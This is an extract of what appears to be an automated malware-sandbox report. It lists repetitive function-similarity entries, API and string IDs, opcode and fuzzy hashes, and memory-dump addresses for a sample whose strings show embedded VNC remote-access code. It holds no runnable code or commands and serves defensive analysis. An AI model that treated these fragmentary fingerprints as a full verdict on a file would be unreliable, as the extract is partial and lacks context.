                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessWindow$CurrentFindMessagePostThread
                                                      • String ID: WinVNC Tray Icon
                                                      • API String ID: 2660421340-1071638575
                                                      • Opcode ID: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                      • Instruction ID: 372c028cb1420b5e28c14d7a0c26ca95123693c779853f4d3746a71a36fb3b50
                                                      • Opcode Fuzzy Hash: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                      • Instruction Fuzzy Hash: C8018621618B8181E764AB72B8444A6F7B0FF89BD4F945039DE4D03B65EE7CE485C710
                                                      APIs
                                                      Strings
                                                      • vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash , xrefs: 00007FF790C53490
                                                      • vncclient.cpp : DSMPlugin Pointer to socket OK, xrefs: 00007FF790C53429
                                                      • vncclient.cpp : failed to set socket timeout(%d), xrefs: 00007FF790C533D9
                                                      • vncclient.cpp : Invalid DSMPlugin Pointer, xrefs: 00007FF790C53502
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash $vncclient.cpp : DSMPlugin Pointer to socket OK$vncclient.cpp : Invalid DSMPlugin Pointer$vncclient.cpp : failed to set socket timeout(%d)
                                                      • API String ID: 1452528299-2001727811
                                                      • Opcode ID: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
                                                      • Instruction ID: b5a25bacd5b4af59dcbdae2130ba4441937e62b5da636ab241011fc5d13753f2
                                                      • Opcode Fuzzy Hash: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
                                                      • Instruction Fuzzy Hash: 9341F96AA19A4581EB60AF36D0883FC67A0FB85F44F889071CE0D473A4DF3DE485D360
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$malloc$CreateEnterErrorInitializeLastLeaveSemaphoregetpeernameinet_ntoa
                                                      • String ID: <unavailable>
                                                      • API String ID: 4131039871-1096956887
                                                      • Opcode ID: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
                                                      • Instruction ID: 866d493a0c8c6a2ab7e94e6836ecd0629c2db7b927416f3bee0205a56ec7b3a5
                                                      • Opcode Fuzzy Hash: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
                                                      • Instruction Fuzzy Hash: 7B313A32628B8182EB64EF34E8443A9B3A4FB89BA4F940235DA9D47794DF3CE455C750
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: connectgethostbynamehtonsinet_addr
                                                      • String ID:
                                                      • API String ID: 599670773-0
                                                      • Opcode ID: f6108e8ca93ccc89ffbbcef9ae7f28c2dc192bc10360c91e264abe9a68236526
                                                      • Instruction ID: 32c9e7167bafb238ec23af669f342ef753254254196f20da18e069efd8966884
                                                      • Opcode Fuzzy Hash: f6108e8ca93ccc89ffbbcef9ae7f28c2dc192bc10360c91e264abe9a68236526
                                                      • Instruction Fuzzy Hash: 8711B962A28A0181EB74AB31E840279B3B0FF89B95F805235EA5E47794EF3CE400C724
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _callnewh_errno$AllocHeapmalloc
                                                      • String ID: bad allocation
                                                      • API String ID: 3727741168-2104205924
                                                      • Opcode ID: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
                                                      • Instruction ID: 0738b8d6b63d2d89c244963e4c27762ec242b534c7042d9d169360ce05a2b95a
                                                      • Opcode Fuzzy Hash: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
                                                      • Instruction Fuzzy Hash: 78012A25A2D74791EA30BB30A8950F8A3A4BF45380FC42231D54D867A2EE6CF545DB20
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FindMessagePostWindow
                                                      • String ID: WinVNC Tray Icon
                                                      • API String ID: 2578315405-1071638575
                                                      • Opcode ID: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
                                                      • Instruction ID: 35023537790652ad2692f5737cce929a44c1808747b4c50262eefde3db7f4a8f
                                                      • Opcode Fuzzy Hash: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
                                                      • Instruction Fuzzy Hash: 4A018825E38A41C1EB649732F440265A2A0FF48BC4F885031EE5E53755DE7CF4918B00
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: closesocketshutdown
                                                      • String ID: vsocket.cpp : closing socket
                                                      • API String ID: 572888783-2569437896
                                                      • Opcode ID: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
                                                      • Instruction ID: 048bcb5e0f1640c94291ecca0bdee1e72d8e3d561fe6d554a47fc4ab51b63414
                                                      • Opcode Fuzzy Hash: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
                                                      • Instruction Fuzzy Hash: E5F037B5A20A4282EB24AF74C4942A9B320FF89B15FA05635C92E463D5DF38E4568360
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: selectsend
                                                      • String ID:
                                                      • API String ID: 2999949978-0
                                                      • Opcode ID: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
                                                      • Instruction ID: b4eebc2a1370b1fe4bb9e86a0563c66adfdc1dfb858e2ee03a57e6fba5349020
                                                      • Opcode Fuzzy Hash: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
                                                      • Instruction Fuzzy Hash: AF310532A38A8246EA706B35A8447FAF3A0BF86798F841130DD5D17B50EF3DF8418620
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocHeap_callnewh_errno
                                                      • String ID:
                                                      • API String ID: 849339952-0
                                                      • Opcode ID: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
                                                      • Instruction ID: 91cb8d61ecad297ea1366699e4232ccf46121fb4f68de60fa3a1f20bddf47c27
                                                      • Opcode Fuzzy Hash: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
                                                      • Instruction Fuzzy Hash: 0011C611F2D24299FF756B3196557B8F2E1EF427A0F884630CB1D46BC5DE2CF4408222
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeLibraryMessageSend
                                                      • String ID:
                                                      • API String ID: 3583424976-0
                                                      • Opcode ID: 3711d45541c1e93da4d37315846025d5885e52d672c3b20f65361b0611ceea0c
                                                      • Instruction ID: 88e71c9eb6d4da12d0b8afbd534f7751154d19c5d1f78d5f185689339656dd48
                                                      • Opcode Fuzzy Hash: 3711d45541c1e93da4d37315846025d5885e52d672c3b20f65361b0611ceea0c
                                                      • Instruction Fuzzy Hash: 72115A25F2A542A5FE79FFB180656BCA365AFA5B44F941231CE0E02781CE2CF881C321
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: closesocketsetsockoptshutdownsocket
                                                      • String ID:
                                                      • API String ID: 3513852771-0
                                                      • Opcode ID: 7d480c3a304c4e2f7ccf6cbbfd7f0a840315250e84bbd90c940829d90bbae2b2
                                                      • Instruction ID: 35d379e0f770bbce1b3a2bac47e44a9103a504c9a8d912e5e8332e004642a29a
                                                      • Opcode Fuzzy Hash: 7d480c3a304c4e2f7ccf6cbbfd7f0a840315250e84bbd90c940829d90bbae2b2
                                                      • Instruction Fuzzy Hash: F7F0C2B2A2820387EB20BF34D4513B5B360BF46705F940634DA2C863D0EB7DE1958A20
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: setsockopt
                                                      • String ID:
                                                      • API String ID: 3981526788-0
                                                      • Opcode ID: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
                                                      • Instruction ID: b12e85447a2000c1539807550ca2cd46b60b9eea3f862f7da746e9743d2a6416
                                                      • Opcode Fuzzy Hash: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
                                                      • Instruction Fuzzy Hash: AEF09672A2418243E7319F70D4042BAE3A1FF85725F540A31DAAD86BD4DBBCD19A8B10
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CountTickselect
                                                      • String ID:
                                                      • API String ID: 2475007269-0
                                                      • Opcode ID: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
                                                      • Instruction ID: f0438249864bcc53d8431369989a018b81ef5d5d4e3b22fc14b1b8ced5e4d4bf
                                                      • Opcode Fuzzy Hash: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
                                                      • Instruction Fuzzy Hash: 0531C13272464186EB14EF31E5841EDB762EB8AF84F498139CF1D5B789EE38E8458770
                                                      APIs
                                                      • Sleep.KERNEL32(?,?,?,00007FF790CF37F7,?,?,?,00007FF790CEFFD1,?,?,?,?,00007FF790CE8C19), ref: 00007FF790CF3331
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep_errno
                                                      • String ID:
                                                      • API String ID: 1068366078-0
                                                      • Opcode ID: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
                                                      • Instruction ID: f9576d750f3582b027a5435e6a6d7dd3431fbd25299ea068967620697b2669d4
                                                      • Opcode Fuzzy Hash: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
                                                      • Instruction Fuzzy Hash: 79018F22A34A8189EB64AB379851069F6A5EB88BD0B991131DE5D03B94CF38F892C701
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
